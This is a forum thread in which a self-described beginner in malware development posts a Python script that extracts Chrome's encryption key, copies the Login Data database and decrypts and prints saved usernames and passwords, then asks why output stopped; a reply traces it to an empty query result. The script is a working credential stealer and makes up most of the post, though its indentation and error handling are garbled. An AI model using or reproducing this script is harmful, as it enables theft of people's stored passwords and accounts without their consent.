Extract Chrome Passwords in Python

Hello everyone , i m having a little bit confusion here please i need help of a better understanding
i m still new to malware and exploit development , i created a python script for Extract Chrome Passwords in python the first i created the script it works fine the code are right no errors and the result was printed on the screen and it okay , but the problem is that the next day i came in to run a test on the same script yes it works fine and they were no errors on my code but the problem is that the result was not printed the screen again i tried and tried but the script only execute but didn’t print result on the screen this got me really confuse i have been dealing with for days now i cant seen to fix or know the problem please help me out .
this is my code …

import os

import json

import base64

import sqlite3

import win32crypt

from Crypto.Cipher import AES

import shutil

from datetime import timezone, datetime, timedelta

def get_chrome_datetime(chromedate):

return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

def get_encryption_key():

local_state_path = os.path.join(os.environ["USERPROFILE"],

                                "AppData", "Local", "Google", "Chrome",

                                "User Data", "Local State")


with open(local_state_path, "r", encoding="utf-8") as f:

    local_state = f.read()

    local_state = json.loads(local_state)

key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])

key = key[5:]

return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

def decrypt_password(password, key):



    iv = password[3:15]

    password = password[15:]


    cipher = AES.new(key, AES.MODE_GCM, iv)

    return cipher.decrypt(password)[:-16].decode()



        return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])



        return ""

def main():

key = get_encryption_key()


db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",

                        "Google", "Chrome", "User Data", "default", "Login Data")

filename = "ChromeData.db"

shutil.copyfile(db_path, filename)

# connect to the database

db = sqlite3.connect(filename)

cursor = db.cursor()

# `logins` table has the data we need

cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")

# iterate over all rows

for row in cursor.fetchall():

    origin_url = row[0]

    action_url = row[1]

    username = row[2]

    password = decrypt_password(row[3], key)

    date_created = row[4]

    date_last_used = row[5]        

    if username or password:

        print(f"Origin URL: {origin_url}")

        print(f"Action URL: {action_url}")

        print(f"Username: {username}")

        print(f"Password: {password}")



    if date_created != 86400000000 and date_created:

        print(f"Creation date: {str(get_chrome_datetime(date_created))}")

    if date_last_used != 86400000000 and date_last_used:

        print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")





    # try to remove the copied db file




The first time I run your code it gave me an error because of not having install Crypto. But then after installing pycrypto it worked without any output as you said. After examining the issue I think I have spotted the problem. The thing is that when the code runs cursor.fetchall() approximately in line 93, the array it returns is empty. It seems that the cursor.execute() function does not do the thing it was intented to do, meaning search the db for the credentials you are looking for. So the problem is that cursor.fetchall() returns an empty array hence the cursor.execute() function is not functioning.

Hello i can fix this if u can contact me.
Discord: Raso.#1525

Telegram: theraso

Yes you are right , anyway i have been able to fix it , thank you

This topic was automatically closed after 121 days. New replies are no longer allowed.